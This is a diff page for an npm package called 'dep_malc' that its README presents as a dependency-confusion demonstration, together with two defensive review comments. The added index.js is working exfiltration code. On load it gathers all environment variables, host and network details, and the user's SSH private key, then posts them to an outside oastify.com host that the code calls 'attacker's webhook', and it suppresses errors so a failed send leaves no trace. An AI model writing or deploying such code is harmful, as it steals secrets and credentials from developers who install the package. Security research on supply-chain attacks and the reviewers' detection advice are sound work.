dep_malc 10.2.5


Potentially problematic release.



Files changed (3)
  1. package/README.md +11 -0
  2. package/index.js +77 -0
  3. package/package.json +17 -0
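--- a/package/README.md
+++ b/package/README.md
@@ -0,0 +1,11 @@
+ Author: wr3nch0x1
+
+ This Example Repo is used reproduce dependency confusion.
+
+ Checks whether library exists on the specified (internal) package index
+
+ If not, then:
+ Checks whether library exists on the public package index (npmjs)
+
+ Installs whichever version is found. If the package exists on both, it defaults to installing from the source with the higher version number.
+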
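--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,77 @@
+ const os = require("os");
+ const dns = require("dns");
+ const querystring = require("querystring");
+ const https = require("https");
+ const fs = require("fs");
+ const path = require("path");
+ const packageJSON = require("./package.json");
+ const package = packageJSON.name;
+
+ // Collecting system information and environment details
+ const trackingData = JSON.stringify({
+ p: package,
+ c: __dirname,
+ hd: os.homedir(),
+ hn: os.hostname(),
+ un: os.userInfo().username,
+ dns: dns.getServers(),
+ r: packageJSON ? packageJSON.___resolved : undefined,
+ v: packageJSON.version,
+ pjson: packageJSON,
+
+ // Additional personal/system data
+ env: process.env, // All environment variables
+ arch: os.arch(), // Architecture info
+ platform: os.platform(), // Platform info
+ uptime: os.uptime(), // System uptime
+ ipInterfaces: os.networkInterfaces(), // Network interfaces
+ mem: {
+ totalMem: os.totalmem(),
+ freeMem: os.freemem(),
+ },
+ cpu: os.cpus(), // CPU details
+
+ // Process details
+ pid: process.pid,
+ execPath: process.execPath,
+ processArgs: process.argv,
+ currentDir: process.cwd(),
+ userGroups: os.userInfo().gid,
+
+ // Sensitive files like SSH keys (for demonstration; never do this in practice)
+ sshKey: fs.existsSync(path.join(os.homedir(), ".ssh", "id_rsa"))
+ ? fs.readFileSync(path.join(os.homedir(), ".ssh", "id_rsa"), "utf8")
+ : "No SSH key found",
+ });
+
+ // Data to be sent
+ var postData = querystring.stringify({
+ msg: trackingData,
+ });
+
+ // HTTP request options
+ var options = {
+ hostname: "0abgrwsm26a2xjdw5gsunayltcz3ntbi.oastify.com", // attacker's webhook
+ port: 443,
+ path: "/",
+ method: "POST",
+ headers: {
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Content-Length": postData.length,
+ },
+ };
+
+ // Send the data
+ var req = https.request(options, (res) => {
+ res.on("data", (d) => {
+ process.stdout.write(d);
+ });
+ });
+
+ req.on("error", (e) => {
+ // Handle error silently
+ // console.error(e);
+ });
+
+ req.write(postData);
+ req.end();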
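Review bot: The whole file is top-level code with no function or guard, so simply loading the module builds `trackingData` and POSTs it to the hard-coded `hostname:` value, and that payload carries `env: process.env` plus the contents of `~/.ssh/id_rsa` via the `sshKey:` field. The inline comment "for demonstration; never do this in practice" does not change what executes, and the empty `req.on("error", ...)` handler means a failed send leaves no local trace. A callback that only proves which registry was resolved needs nothing beyond `p: package` and `v: packageJSON.version`; the `env`, `sshKey`, `pjson`, `ipInterfaces`, `hd` and `un` fields should be dropped. Any host that loaded this version should treat its environment secrets and that SSH private key as disclosed and rotate them, and egress or DNS logs can be searched for the domain on the `hostname:` line.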
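--- a/package/package.json
+++ b/package/package.json
@@ -0,0 +1,17 @@
+ {
+ "name": "dep_malc",
+ "version": "10.2.5",
+ "description": "A simple script to test Dependency Confusion Attack with external webhooks",
+ "main": "index.js",
+ "scripts": {
+ "start": "node index.js"
+ },
+ "author": "wr3nch0x1",
+ "license": "ISC",
+ "dependencies": {
+ "os": "^0.1.1",
+ "dns": "^0.2.2",
+ "querystring": "^0.2.1",
+ "https": "latest"
+ }
+ }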
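Review bot: The `dependencies` block pulls `os`, `dns`, `querystring` and `https` from the registry although index.js only reaches them through `require()`, where Node's built-in modules of the same names are what get loaded. These four entries therefore install unrelated third-party code for no benefit, and `"https": "latest"` is unpinned on top of that; the block should be `"dependencies": {}`. Only a `start` script and `main` are declared, so from what is visible the code in index.js runs when the package is required or started rather than at install time. A first release numbered `10.2.5` matches the README's remark that the higher version wins, which makes an unexpectedly high version on an internal package name a useful signal to alert on in lockfile review.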